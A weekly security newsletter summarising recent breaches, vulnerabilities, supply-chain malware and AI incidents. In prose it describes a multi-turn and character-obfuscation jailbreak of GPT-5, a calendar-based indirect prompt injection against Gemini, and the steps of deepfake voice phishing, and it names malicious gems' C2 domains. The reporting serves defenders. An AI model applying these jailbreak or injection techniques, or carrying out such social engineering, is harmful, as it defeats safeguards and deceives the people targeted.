Robert Grupe's AppSecNewsBits 2025-08-09
This week's epic blunders and failed expectations: vishing attacks exposing unencrypted cloud data, Grok generating nonconsensual nude images again, GPT-5 meh, and more avoidable tragic comedies ...
EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Google suffers data breach in ongoing Salesforce data theft attacks
Google is the latest company to suffer a data breach in an ongoing wave of Salesforce CRM data theft attacks conducted by the ShinyHunters extortion group. Other companies impacted in these attacks include Adidas, Qantas, Allianz Life, Cisco, and the LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co. One company has already paid 4 Bitcoins, or approximately $400,000, to prevent the leak of its data. ShinyHunters is targeting companies' employees in voice phishing (vishing) social engineering attacks to breach Salesforce instances and download customer data. This data is then used to extort companies into paying a ransom to prevent the data from being leaked.
[rG: And once again, data security fail. Exfiltration wouldn’t be sensitive data exposure if the data is strongly encrypted at-rest, along with strong access management (user fields, privileged separation of duties).]
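One flavor of the "not sensitive if exfiltrated" idea in the note, sketched here as a hedged illustration (the key name and token scheme are hypothetical, not from the article): store sensitive CRM fields only as keyed pseudonyms, so a bulk export alone reveals nothing. Real deployments would use a KMS-backed field-level encryption or tokenization service.

```python
import hashlib
import hmac

# Hedged sketch of field-level pseudonymization: the CRM stores a keyed
# token instead of the raw value. Resolving a token back to the real value
# requires a separate keyed lookup service, which vished CRM credentials
# alone would not expose.
KEY = b"kms-managed-secret"  # placeholder; never hardcode a key in practice

def tokenize(value: str) -> str:
    """Deterministic keyed token, usable as a join key across records."""
    return hmac.new(KEY, value.encode(), hashlib.sha256).hexdigest()[:16]

record = {"name": "Alice Example", "email": tokenize("alice@example.com")}
assert record["email"] != "alice@example.com"          # export is opaque
assert record["email"] == tokenize("alice@example.com")  # still joinable
```

Deterministic tokens preserve the ability to deduplicate and join records, at the cost of leaking equality between rows; randomized encryption avoids that but loses the join property.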
Voice phishers strike again, this time hitting Cisco
The exported data primarily consisted of basic account profile information of individuals who registered for a user account on Cisco[.]com. Information included names, organization names, addresses, Cisco assigned user IDs, email addresses, phone numbers, and account-related metadata such as creation date.
Phishing attacks, particularly those relying on voice calls, have emerged as a key method for ransomware groups and other sorts of threat actors to breach defenses of some of the world’s most fortified organizations.
Some of the companies successfully compromised in such attacks include Microsoft, Okta, Nvidia, Globant, Twilio, and Twitter.
Here’s how deepfake vishing attacks work, and why they can be hard to detect
Collecting voice samples of the person who will be impersonated. Samples as short as three seconds are sometimes adequate. They can come from videos, online meetings, or previous voice calls.
Feeding the samples into AI-based speech-synthesis engines, such as Google’s Tacotron 2, Microsoft’s Vall-E, or services from ElevenLabs and Resemble AI.
An optional step is to spoof the number belonging to the person or organization being impersonated.
Initiate the scam call. In some cases, the cloned voice will follow a script. In other more sophisticated attacks, the faked speech is generated in real time, using voice masking or transformation software.
Precautions for preventing such scams from succeeding can be as simple as parties agreeing to a randomly chosen word or phrase that the caller must provide before the recipient complies with a request. Recipients can also end the call and call the person back at a number known to belong to the caller. But it's best to follow both steps.
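A static passphrase can be captured and replayed by a deepfake caller; the same idea is stronger as a challenge-response. This is a hypothetical sketch, not a protocol from the article: both parties agree on a secret in person, and the recipient reads out a fresh random challenge that the caller must answer.

```python
import hashlib
import hmac
import secrets

def challenge() -> str:
    """Recipient generates a short random challenge to read aloud."""
    return secrets.token_hex(4)  # e.g. "9f3a1c2b"

def response(shared_secret: str, chal: str) -> str:
    """Caller derives the expected answer from the pre-shared secret."""
    digest = hmac.new(shared_secret.encode(), chal.encode(), hashlib.sha256)
    return digest.hexdigest()[:8]  # short enough to read over the phone

def verify(shared_secret: str, chal: str, answer: str) -> bool:
    return hmac.compare_digest(response(shared_secret, chal), answer)

secret = "correct horse battery staple"  # agreed in person beforehand
c = challenge()
assert verify(secret, c, response(secret, c))
assert not verify(secret, c, "deadbeef")
```

Because each challenge is random, a recording of a previous call is useless to an attacker, which a fixed code word cannot guarantee.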
[rG: Corporate anti-vishing training and simulation testing services are going to rise steeply in 2025 InfoSec spending budgets.]
Three US agencies get failing grades for not following IT best practices
The GAO flagged failures at the General Services Administration (GSA), Environmental Protection Agency (EPA), and Department of Homeland Security (DHS) in the three reports, each agency with more unimplemented recommendations than the last. The DHS' CIO, in particular, has 43 unresolved recommendations dating back to 2018, seven of which the GAO identified as priority matters. The GSA has only four outstanding items, while the EPA has 11.
The EPA hasn't bothered to submit required documentation to the FedRAMP program office to ensure it's complying with that program's cloud security requirements, nor has it bothered to maintain a list of corrective actions being taken to track weaknesses. The EPA still hasn't established a process for conducting an organization-wide cybersecurity risk assessment, despite first being asked to do so in 2018.
DHS lacks sufficient documentation on how it will maintain security for all of the PII stored in HART systems; hasn't established Agile software development training requirements despite being required to do so; and hasn't transitioned its systems to IPv6 as required.
AWS deleted 10 years' worth of a software engineer's data
It all began with a simple verification request from AWS, which expired before Boudih could respond. The next form arrived and required ID and a copy of a utility bill, which Boudih sent in. AWS claimed the document was unreadable. The next day, Boudih's account was terminated. The trail didn't end there, as Boudih attempted to find out if the data was still in existence. The penultimate message from support read, "Because the account verification wasn’t completed by this date, the resources on the account were terminated." The final message had AWS asking for feedback on the experience.
Despite jumping through all of the hoops set up by the AWS support team, Boudih says they received "zero straight answers" and "multiple requests for 5-star reviews" while their data hung in the balance. Boudih is rightly upset, especially since AWS documentation states that there is a 90-day grace period between account closure and data deletion. After those 90 days, the account is closed forever, and all data is deleted. Considering Boudih never made it past 20 days, it seems like AWS is at least partly at fault here. AWS ultimately blamed the account's destruction on an issue with a third-party payer.
Microsoft Used China-Based Engineers to Support Product Recently Hacked by China
Microsoft announced that Chinese state-sponsored hackers had exploited vulnerabilities in its popular SharePoint software but didn’t mention that it has long used China-based engineers to maintain the product.
It’s unclear if Microsoft’s China-based staff had any role in the SharePoint hack. But experts have said allowing China-based personnel to perform technical support and maintenance on U.S. government systems can pose major security risks. Laws in China grant the country’s officials broad authority to collect data, and experts say it is difficult for any Chinese citizen or company to meaningfully resist a direct request from security forces or law enforcement.
Microsoft has for a decade relied on foreign workers — including those based in China — to maintain the Defense Department’s cloud systems, with oversight coming from U.S.-based personnel known as digital escorts. But those escorts often don’t have the advanced technical expertise to police foreign counterparts with far more advanced skills, leaving highly sensitive information vulnerable.
Encryption Made For Police and Military Radios May Be Easily Cracked
The European Telecommunications Standards Institute (ETSI), which developed the algorithm, advised anyone using it for sensitive communication to deploy an end-to-end encryption solution on top of the flawed algorithm to bolster the security of their communications. But researchers have found that the encryption algorithm used for the device they examined starts with a 128-bit key, but this gets compressed to 56 bits before it encrypts traffic, making it easier to crack. It's not clear who is using this implementation of the end-to-end encryption algorithm, nor if anyone using devices with the end-to-end encryption is aware of the security vulnerability in them.
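Some back-of-envelope arithmetic makes clear what compressing a 128-bit key to 56 bits before use actually costs:

```python
# Shrinking a 128-bit key to 56 bits collapses the search space
# by a factor of 2**72.
full = 2 ** 128
weakened = 2 ** 56

print(f"keys at 128 bits: {full:.2e}")
print(f"keys at 56 bits:  {weakened:.2e}")
print(f"reduction factor: 2**{(full // weakened).bit_length() - 1}")

# 2**56 is about 7.2e16 keys, a space within reach of brute force
# (DES, also 56-bit, has been publicly cracked since the late 1990s),
# while 2**128 remains far beyond any practical search.
assert weakened == full >> 72
```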
Red Teams Jailbreak GPT-5 With Ease, Warn It’s ‘Nearly Unusable’ for Enterprise
After Grok-4 fell to a jailbreak in two days, GPT-5 fell in 24 hours to the same researchers.
“The attack successfully guided the new model to produce a step-by-step manual for creating a Molotov cocktail,” claims the firm. The success in doing so highlights the difficulty all AI models have in providing guardrails against context manipulation.
This proof-of-concept exposes a critical flaw in safety systems that screen prompts in isolation, revealing how multi-turn attacks can slip past single-prompt filters and intent detectors by leveraging the full conversational context. Obfuscation attacks still work. “One of the most effective techniques we used was a StringJoin Obfuscation Attack, inserting hyphens between every character and wrapping the prompt in a fake encryption challenge.”
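The StringJoin transformation the researchers describe is trivial to reproduce, and illustrating it (with a benign string, and no jailbreak payload) shows exactly why single-prompt keyword filters miss it:

```python
# Illustration of the obfuscation step described above: inserting a
# separator between every character defeats naive substring matching,
# while an LLM can still reconstruct the original text from context.
def string_join_obfuscate(text: str, sep: str = "-") -> str:
    return sep.join(text)

assert string_join_obfuscate("hello") == "h-e-l-l-o"
# A filter doing a plain substring match no longer sees the term:
assert "hello" not in string_join_obfuscate("hello")
```

Defending against this requires normalizing or de-obfuscating input before filtering, and evaluating intent across the whole conversation rather than per prompt.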
Hands on OpenAI's GPT-5: Meet President Willian H. Brusen from the great state of Onegon
We asked the LLM to "generate a map of the USA with each state named." It responded with a drawing that gets the sizes and shapes of the states right, but all of the state names are wrong except Montana and Kansas. Some of the letters aren't even legible. Google Gemini did a worse job with its state names than GPT-5 did: on Gemini's map, not even one state is correct.
Clearly, drawing text within images is hard and neither GPT-5 nor its competitors have gotten it correct yet . . . unless you ask them about James Bond.
OpenAI’s new model can't believe that Trump is back in office
Ask gpt-oss-20b "who won the 2024 presidential election" and there's a non-zero chance that it'll tell you Joe Biden won the race and, once it's locked in its answer, it refuses to believe otherwise. "President Joe Biden won the 2024 United States presidential election, securing a second term in office," the chat bot confidently responded.
Attempt to correct the model and it'll vehemently defend this answer. "I'm sorry for the confusion, but the 2024 U.S. presidential election was won by President Joe Biden. The official vote counts and the Electoral College results confirmed his victory, and he remains the sitting president as of August 2025."
However, it should be noted that the model's responses varied from run to run. In some cases, it outright refused to answer, while in others it warned that the election took place after its knowledge cutoff. In one case, gpt-oss-20b insisted that Donald Trump scored a victory over a fictional Democratic candidate, Marjorie T. Lee.
Grok generates fake Taylor Swift nudes without being asked
Jess Weatherbed was shocked to discover the video generator spat out topless images of Swift "the very first time" she used it. Grok produced more than 30 images of Swift in revealing clothing when asked to depict "Taylor Swift celebrating Coachella with the boys." Using the Grok Imagine feature, users can choose from four presets—"custom," "normal," "fun," and "spicy"—to convert such images into video clips in 15 seconds.
At that point, all Weatherbed did was select "spicy" and confirm her birth date for Grok to generate a clip of Swift tearing "off her clothes" and "dancing in a thong" in front of "a largely indifferent AI-generated crowd."
The outputs that Weatherbed managed to generate without jailbreaking or any intentional prompting are particularly concerning, given the major controversy after sexualized deepfakes of Swift flooded X last year. Back then, X reminded users that "posting Non-Consensual Nudity (NCN) images is strictly prohibited on X and we have a zero-tolerance policy towards such content."
With enforcement of the Take It Down Act starting next year—requiring platforms to promptly remove non-consensual sex images, including AI-generated nudes — xAI could potentially face legal consequences if Grok's outputs aren't corrected.
Google’s healthcare AI made up a body part — what happens when doctors don’t notice?
One glaring error proved so persuasive that it took over a year to be caught. In their May 2024 research paper introducing a healthcare AI model, dubbed Med-Gemini, Google researchers showed off the AI analyzing brain scans from the radiology lab for various conditions. It identified an "old left basilar ganglia infarct," referring to a purported part of the brain — "basilar ganglia" — that simply doesn't exist in the human body. Google fixed its blog post about the AI — but failed to revise the research paper itself. The AI likely conflated the basal ganglia, an area of the brain that's associated with motor movements and habit formation, and the basilar artery, a major blood vessel at the base of the brainstem. Google blamed the incident on a simple misspelling of "basal ganglia." It's an embarrassing reveal that underlines persistent and impactful shortcomings of the tech. Even the latest "reasoning" AIs by the likes of Google and OpenAI are spreading falsehoods dreamed up by large language models that are trained on vast swathes of the internet.
After using ChatGPT, man swaps his salt for sodium bromide—and suffers psychosis
After seeking advice on health topics from ChatGPT, a 60-year-old man who had a "history of studying nutrition in college" decided to try a health experiment: He would eliminate all chlorine from his diet, which for him meant eliminating even table salt (sodium chloride). His ChatGPT conversations led him to believe that he could replace his sodium chloride with sodium bromide. Three months later, the man showed up at his local emergency room. His neighbor, he said, was trying to poison him. Though extremely thirsty, the man was paranoid about accepting the water that the hospital offered him, telling doctors that he had begun distilling his own water at home and that he was on an extremely restrictive vegetarian diet. He did not mention the sodium bromide or the ChatGPT discussions. His distress, coupled with the odd behavior, led the doctors to run a broad set of lab tests, revealing multiple micronutrient deficiencies, especially in key vitamins. But the bigger problem was that the man appeared to be suffering from a serious case of "bromism." A century ago, somewhere around 8–10 percent of all psychiatric admissions in the US were caused by bromism. In the end, the man suffered from a terrifying psychosis and was kept in the hospital under an involuntary psychiatric hold for three full weeks over an entirely preventable condition.
Google Gemini struggles to write code, calls itself “a disgrace to my species”
Gemini kept going in that vein and eventually repeated the phrase, "I am a disgrace," over 80 times consecutively. Other users have reported similar events, and Google says it is working on a fix.
Before dissolving into the "I am a failure" loop, Gemini complained that it had "been a long and arduous debugging session" and that it had "tried everything I can think of" but couldn't fix the problem in the code it was trying to write. "I am going to have a complete and total mental breakdown. I am going to be institutionalized. They are going to put me in a padded room and I am going to write... code on the walls with my own feces," it said.
German phone repair biz collapses following 2023 ransomware attack
The managing director said the company's financial failings were due to the public prosecutor's office refusing to return the stolen cryptocurrency tokens it paid the attackers. Reportedly in the high six-figure range, authorities seized the ransom payment as part of their investigation into the cybercriminals, but the assets were never returned.
What’s Weak This Week:
CISA Releases Malware Analysis Report Associated with Microsoft SharePoint Vulnerabilities
CVE-2025-49704 [CWE-94: Code Injection]
CVE-2025-49706 [CWE-287: Improper Authentication]
CVE-2025-53770 [CWE-502: Deserialization of Untrusted Data], and
CVE-2025-53771 [CWE-287: Improper Authentication]
CVE-2022-40799 D-Link DNR-322L Download of Code Without Integrity Check Vulnerability:
Could allow an authenticated attacker to execute OS level commands on the device. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization. Related CWE: CWE-494
CVE-2020-25079 D-Link DCS-2530L and DCS-2670L Command Injection Vulnerability:
The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization. Related CWE: CWE-77
CVE-2020-25078 D-Link DCS-2530L and DCS-2670L Devices Unspecified Vulnerability:
Could allow for remote administrator password disclosure. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
HACKING
FTC: older adults lost record $700 million to scammers in 2024
Losses among those who lost over $100,000 jumped eightfold compared to 2020.
The victims were told lies crafted to create urgency: suspicious activity on their bank accounts, Social Security numbers implicated in crimes, or malware infections and hacks of their computers. Scammers posed as businesses like Microsoft and Amazon, offering to help targets with an alleged issue. In another layer of irony, they often impersonated the FTC itself, the nation's consumer protection agency, sometimes posing as real staff.
While the $445 million lost in 2024 by people over the age of 60 is no doubt a significant amount, it pales in comparison to the total amount Americans lost to fraud in 2024, which, according to the FTC, was $12.5 billion. This was a record amount, constituting a 25% increase over 2023.
5,000+ Fake Online Pharmacies Websites Selling Counterfeit Medicines
This massive operation, orchestrated by a single threat actor group, targets vulnerable individuals seeking prescription medications through deceptive digital storefronts that mimic legitimate pharmaceutical retailers. The fraudulent network exploits human desperation and medical stigma by targeting high-demand medications including erectile dysfunction treatments, essential antibiotics like Amoxicillin, costly weight-loss drugs, and antivirals falsely marketed during health crises.
The system generates carefully crafted error messages such as “If our system can’t accept your card, you will receive payment details to complete the payment” and “Please make sure your card allows online transactions,” creating artificial urgency that pressures victims into completing transactions despite technical red flags that would normally indicate fraudulent activity.
Sites are stashing exploit code inside racy .svg files
Running JavaScript from inside an image? What could possibly go wrong? The Scalable Vector Graphics format is an open standard for rendering two-dimensional graphics. Unlike more common formats such as .jpg or .png, .svg uses XML-based text to specify how the image should appear, allowing files to be resized without losing quality due to pixelation. But therein lies the rub: The text in these files can incorporate HTML and JavaScript, and that, in turn, opens the risk of them being abused for a range of attacks, including cross-site scripting, HTML injection, and denial of service. Malicious uses of the .svg format have been documented before.
In 2023, hackers used an .svg tag to exploit a cross-site scripting bug in Roundcube, a server application that was used by more than 1,000 webmail services and millions of their end users. In June, researchers documented a phishing attack that used an .svg file to open a fake Microsoft login screen with the target’s email address already filled in.
[rG: For mitigation, ensure use of strong anti-virus scanner with most recent updates and heuristics.]
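Beyond antivirus, sites that accept user-uploaded SVGs can sanitize them server-side. Here is a minimal sketch using Python's standard-library XML parser, stripping script-bearing elements and event-handler attributes; it is an illustration only, and production code should use a vetted sanitizer library and also handle `javascript:` URIs in `href` attributes, which this sketch ignores.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Match both namespaced and bare forms of the dangerous elements.
DANGEROUS_TAGS = {
    f"{{{SVG_NS}}}script", "script",
    f"{{{SVG_NS}}}foreignObject", "foreignObject",
}

def sanitize_svg(svg_text: str) -> str:
    """Remove <script>/<foreignObject> elements and on* event attributes."""
    root = ET.fromstring(svg_text)
    for parent in list(root.iter()):
        for child in list(parent):
            if child.tag in DANGEROUS_TAGS:
                parent.remove(child)
    for el in root.iter():
        for attr in [a for a in el.attrib if a.lower().startswith("on")]:
            del el.attrib[attr]  # onload, onclick, onmouseover, ...
    return ET.tostring(root, encoding="unicode")

dirty = ('<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
         '<script>alert(2)</script><rect width="1" height="1"/></svg>')
clean = sanitize_svg(dirty)
assert "script" not in clean and "onload" not in clean
```

Serving uploaded SVGs with a restrictive Content-Security-Policy, or rasterizing them to PNG, closes the same class of attack more robustly.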
Researchers design “promptware” attack with Google Calendar to turn Gemini evil
Google and other big names in AI spend a lot of time talking about AI safety, but the ever-evolving capabilities of AI have also led to a changing landscape of malware threats: "promptware." The researchers used Gemini's web of connectivity to perform what's known as an indirect prompt injection attack, in which malicious actions are given to an AI bot by someone other than the user. Using simple calendar appointments, the team tricked Gemini into manipulating Google smart home devices, which may be the first example of an AI attack having real-world effects.
Robots can program each other's brains with AI, scientist shows
The idea of a drone system autonomously scaffolding its own command and control center via generative AI is not only ambitious but also highly aligned with the direction in which frontier spatial intelligence is heading.
Generative AI models can be prompted to write all the code required to create a real-time, self-hosted drone GCS – or rather WebGCS, because the code runs a Flask web server on the Raspberry Pi Zero 2 W card on the drone. The drone thus hosts its own AI-authored control website, accessible over the internet, while in the air.
One of the paper's observations is that current AI models can't handle much more than 10,000 lines of code.
Who Got Arrested in the Raid on the XSS Crime Forum?
The European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.
My Scammer
I responded to one of those spam texts from a “recruiter”—then took the job. It got weirder than I could have imagined.
60 malicious Ruby gems downloaded 275,000 times steal credentials
All 60 gems highlighted in the Socket report present a graphical user interface (GUI) that appears legitimate, as well as the advertised functionality. In practice, however, they act as phishing tools that exfiltrate the credentials users enter on the login form to the attackers on a hardcoded command-and-control (C2) address (programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr).
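The hardcoded C2 addresses are exactly the kind of signal supply-chain scanners key on. This is a toy, hypothetical version of such a static check (real tools like Socket combine many signals), flagging string literals in package source that contain domains the package has no declared reason to contact:

```python
import re

# Match quoted string literals containing a bare domain or URL.
DOMAIN_RE = re.compile(
    r"['\"](?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:/[^'\"]*)?['\"]",
    re.I,
)

def hardcoded_domains(source: str, allowlist: set[str] = frozenset()) -> set[str]:
    """Return domains hardcoded in source, minus known-good ones."""
    return {d.lower() for d in DOMAIN_RE.findall(source)} - set(allowlist)

gem_src = '''
uri = URI("https://programzon.com/auth")
Net::HTTP.post_form(uri, user: user, pass: password)
'''
assert hardcoded_domains(gem_src) == {"programzon.com"}
```

A finding like this is only a lead, not a verdict; legitimate packages hardcode domains too, which is why an allowlist (and human review) sits behind such checks.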
Fake WhatsApp developer libraries hide destructive data-wiping code
The packages, discovered by researchers at Socket, masquerade as WhatsApp socket libraries and were downloaded over 1,100 times since their publication last month. The names of the two malicious packages are naya-flore and nvlore-hsc, though the same publisher has submitted more on NPM, like nouku-search, very-nay, naya-clone, node-smsk, and @veryflore/disc. Although these additional five packages are not currently malicious, extreme caution is advised, as an update pushed at any time could inject dangerous code.
HBO: “Most Wanted: Teen Hacker”
The four-part series follows the exploits of Julius Kivimäki, a prolific Finnish hacker recently convicted of leaking tens of thousands of patient records from an online psychotherapy practice while attempting to extort the clinic and its patients. The documentary explores Kivimäki’s lengthy and increasingly destructive career, one that was marked by cyber attacks designed to result in real-world physical impacts on their targets.
APPSEC, DEVSECOPS, DEV
Call Of Duty Has New Security Measures, Adding Secure-Boot Requirement
Activision will require PC players of Call of Duty: Black Ops 7 to enable Trusted Platform Module 2.0 and Windows Secure Boot when the game launches later this year.
TPM 2.0 verifies untampered boot processes while Secure Boot ensures Windows loads only trusted software at startup. Both features perform checks during system and game startup but remain inactive during gameplay.
Writing code was never the bottleneck!
As companies continue to invest in their AI capabilities, sometimes even citing them to justify layoffs, 60% of organizations still struggle to effectively measure their impact on software velocity or stability. Regardless of their actual effectiveness, developers like using these tools, and they are here to stay. According to a recent McKinsey survey, engineers find that, with generative AI, they are happier, more able to focus on satisfying and meaningful work, and more able to achieve “flow state.” This improvement to developer experience shouldn’t be ignored. But when software quality, speed, and security are at risk, engineering leadership must weigh AI’s impact on the whole software development lifecycle.
The cool AI use cases that are all shown on keynote stages are not the ones that are going to be used. Be ready to work in the boring. Everyone goes into the role of CAIO thinking: ‘I’m going to bring magical, agentic-powered robots that are going to change my business entirely.’ What you’re probably going to do is automated approvals for a while so people get comfortable with that. Be ready for the human aspect, because you will become a salesperson for making people’s lives better. The top AI use case at SAP, by far, is scanning and processing business expense receipts.
Last year’s DORA report found that a 25% increase in AI adoption led to a 7.2% decrease in delivery stability and a 1.5% decrease in delivery throughput. Organizations should be measuring the impact of AI on the software development lifecycle, as well as on the long-term maintainability of code.
Devs don’t need AI to write their code, they need it to get out of the damn queue. Most of the frustration I see isn’t about building, it’s about waiting. Waiting for infra, approvals, or some process that exists ‘just because’.
VENDORS & PLATFORMS
Microsoft researchers bullish on AI security agent even though it let 74% of malware slip through
The prototype, called Project Ire, reverse engineers software "without any clues about its origin or purpose," and then determines if the code is malicious or benign, using large language models (LLM) and a bunch of callable reverse engineering and binary analysis tools. The prototype will be integrated into Microsoft's Defender suite of security tools that encompass antivirus, endpoint, email, and cloud security as a binary analyzer for threat detection and software classification. In a real-world test of about 4,000 "hard-target" files, meaning that they weren't classified by automated systems and would otherwise be manually reviewed by human reverse engineers, nearly 9 out of 10 files (89 percent) that Project Ire flagged as malicious were actually malicious. However, the AI agent only detected about a quarter (26 percent) of all the malware in this test.
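The article's numbers map onto the standard precision/recall distinction, and restating them makes the headline's "74% slipped through" explicit. The sample counts below are illustrative assumptions, not figures from the report:

```python
# Assume 1,000 actual malware samples among the ~4,000 hard-target files.
actual_malware = 1000
true_positives = int(actual_malware * 0.26)   # recall: 26% of malware flagged
flagged_total = round(true_positives / 0.89)  # precision: 89% of flags correct

precision = true_positives / flagged_total
recall = true_positives / actual_malware
missed = actual_malware - true_positives

print(f"precision = {precision:.0%}, recall = {recall:.0%}")
print(f"malware that slipped through: {missed / actual_malware:.0%}")
```

High precision with low recall is a defensible design point for an autonomous triage agent: its "malicious" verdicts are trustworthy enough to act on, while everything it misses still falls through to existing detection layers and human analysts.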
AI-based malware analysis is not new, with antivirus vendors like Cylance (now Arctic Wolf) using machine learning to analyze files for nearly a decade.
AI chatbots can run with medical misinformation, study finds, highlighting the need for stronger safeguards
A new study by researchers at the Icahn School of Medicine at Mount Sinai finds that widely used AI chatbots are highly vulnerable to repeating and elaborating on false medical information, revealing a critical need for stronger safeguards before these tools can be trusted in health care. They not only repeated the misinformation but often expanded on it, offering confident explanations for non-existent conditions.
Some AI tools don’t understand biology yet
"As our deliberately simple baselines are incapable of representing realistic biological complexity yet were not outperformed by the foundation models," the researchers write, "we conclude that the latter’s goal of providing a generalizable representation of cellular states and predicting the outcome of not-yet-performed experiments is still elusive."
MIT: GPT-5 is here. Now what?
Whereas o1 was a major technological advancement, GPT-5 is, above all else, a refined product. During a press briefing, Sam Altman compared GPT-5 to Apple’s Retina displays, and it’s an apt analogy, though perhaps not in the way that he intended. Much like an unprecedentedly crisp screen, GPT-5 will furnish a more pleasant and seamless user experience. That’s not nothing, but it falls far short of the transformative AI future that Altman has spent much of the past year hyping. In the briefing, Altman called GPT-5 “a significant step along the path to AGI,” or artificial general intelligence, and maybe he’s right—but if so, it’s a very small step.
ChatGPT users hate GPT-5’s “overworked secretary” energy, miss their GPT-4o buddy
On the OpenAI community forums and Reddit, long-time chatters are expressing sorrow at losing access to models like GPT-4o. They explain the feeling as "mentally devastating," and "like a buddy of mine has been replaced by a customer service representative." These threads are full of people pledging to end their paid subscriptions. It's worth noting, though, that many of these posts look to us like they have been composed partially or entirely with AI. So even when long-time chat users are complaining, they're still engaged with generative artificial intelligence.
Other complaints are less about the emotional toll of losing a friend, claiming that GPT-5's outputs are too sterile and lack creativity. Workflows that were developed over the past year with GPT-4o simply don't work as well in GPT-5. Posters have labeled it an "overworked secretary" and pointed to this as the beginning of enshittification for AI.
DeepMind reveals Genie 3 “world model” that creates real-time interactive simulations
World models take that to the next level, generating an interactive world frame by frame. This provides an opportunity to refine how AI models—including so-called "embodied agents"—behave when they encounter real-world situations.
The model can't simulate real-world locations—everything it generates is unique and non-deterministic. That means it's also prone to the typical AI hallucinations. For example, the nuance of human locomotion sometimes gets lost in the generative shuffle, producing people who appear to walk backward. Text in these AI worlds is also a jumble unless the prompt includes specific strings for the model to include.
OpenAI announces two “gpt-oss” open AI models you can download
gpt-oss-120b and gpt-oss-20b are available for download today on HuggingFace. There are also GitHub repos for your perusal, and OpenAI will host stock versions of the models on its own infrastructure for testing. If you are interested in more technical details, the company has provided both a model card and a research blog post.
Because these models are fully open and governed by the Apache 2.0 license, developers will be able to tune them for specific use cases.
Apple brings OpenAI’s GPT-5 to iOS and macOS
It's unclear exactly how GPT-5's new approach to model-switching will work here. The ChatGPT integration in iOS doesn't run all that deep. In most cases, LLM-related features built into iOS and macOS use Apple's own models, which live under the Apple Intelligence branding umbrella. But it gives users the choice of referring a prompt to ChatGPT on a case-by-case basis when the prompt is outside the scope of what Apple's models are designed for. GPT-5 is a vastly more powerful model than anything under Apple Intelligence; many of Apple's models run locally and have a fraction of the parameters (around 3 billion to GPT-5's more than 500 billion), making them more prone to errors and limited in their capabilities.
Microsoft Says Future Versions of Windows Will Make Today's OS Feel Alien to Use — Hints at an Agentic OS in 2030.
"I truly believe the future version of Windows and other Microsoft operating systems will interact in a multimodal way. The computer will be able to see what we see, hear what we hear, and we can talk to it and ask it to do much more sophisticated things." [rG: HAL: “I’m sorry Dave, I’m afraid I can’t do that.”]
US executive branch agencies will use ChatGPT Enterprise for just $1 per agency
OpenAI announced an agreement to supply ChatGPT Enterprise to more than 2 million workers in the US federal executive branch.
The details of how ChatGPT will ensure the necessary high standards of security for federal workers are also not publicly known, though a GSA spokesperson responded to a question by saying "the government is taking a cautious, security-first approach to AI," adding, "this ensures sensitive information remains protected while enabling agencies to benefit from AI-driven efficiencies."
I see you’re riding an Uber to work. Would you like a cheap coffee on the way?
Rideshare giant wants to use AI for delivery of hyper-personalized offers
LEGAL & REGULATORY
Millions of age checks performed as UK Online Safety Act gets rolling
The UK government has reported that an additional five million age checks are being made daily as UK-based internet users seek to access age-restricted sites following the implementation of the Online Safety Act. The UK's Online Safety Act is now in force (since July 25), meaning that, according to the UK government, users under the age of 18 should be protected "from harmful content they shouldn't ever be seeing." This includes content such as pornography, eating disorders, self-harm, and so on. This is achieved by mandating that platforms use age verification methods, such as facial scans, photo ID, and credit card checks. Failure to do so risks a fine of up to 10 percent of global revenue or £18 million, whichever is greater.
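The fine structure above is a "greater of" cap: 10 percent of global revenue or £18 million, whichever is larger. A minimal sketch of that arithmetic (function name and revenue figures are illustrative, not from the Act):

```python
# Hypothetical illustration of the Online Safety Act fine cap:
# up to 10% of global revenue or £18 million, whichever is greater.
def max_osa_fine(global_revenue_gbp: float) -> float:
    return max(0.10 * global_revenue_gbp, 18_000_000)

print(max_osa_fine(100_000_000))    # revenue £100M: the £18M floor applies
print(max_osa_fine(1_000_000_000))  # revenue £1B: the 10% share applies
```

The flat £18 million floor means small platforms face a proportionally heavier maximum penalty than the 10 percent figure alone would suggest.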
When hyperscalers can’t safeguard one nation’s data from another, dark clouds are ahead
The most succinct definition of the cloud is the most useful here: it’s somebody else’s computer. If someone else can be compelled by law to let someone you don’t like turn up with a big USB drive and a writ, you do not have data sovereignty. The same goes if you’re the one seeking to help yourself to someone else’s data. The ultimate safeguard against legal, invisible, state-sponsored snooping is on-prem services. Will your own data security be as good as that of the hyperscalers, or will you be more vulnerable to other threats that way? What do you lose in scalability and reliability, and what happens if you want to operate in markets with data sovereignty restrictions not to your advantage? If you’re the NSA or GCHQ, the answers are going to be clear. For everyone else, the shifting sands of the international legal, regulatory and power-brokering environment mean more uncertainty on the horizon.
OpenAI offers 20 million user chats in ChatGPT lawsuit. NYT wants 120 million.
OpenAI is preparing to raise what could be its final defense to stop The New York Times from digging through a spectacularly broad range of ChatGPT logs to hunt for any copyright-infringing outputs that could become the most damning evidence in the hotly watched case.
Previously, OpenAI had vowed to stop what it deemed was the NYT's attempt to conduct "mass surveillance" of ChatGPT users. But ultimately, OpenAI lost its fight to keep news plaintiffs away from all ChatGPT logs.
After that loss, OpenAI appears to have pivoted and is now doing everything in its power to limit the number of logs accessed in the case—short of settling—as its customers fretted over serious privacy concerns. For the most vulnerable users, the lawsuit threatened to expose ChatGPT outputs from sensitive chats that OpenAI had previously promised would be deleted.
[rG: For enterprises incorporating AI technologies through software developed externally and internally, the concern will be what precedents this case could set for their implemented AI enhanced services and data retention.]
Disney Struggles With How to Use AI - While Retaining Copyrights and Avoiding Legal Issues
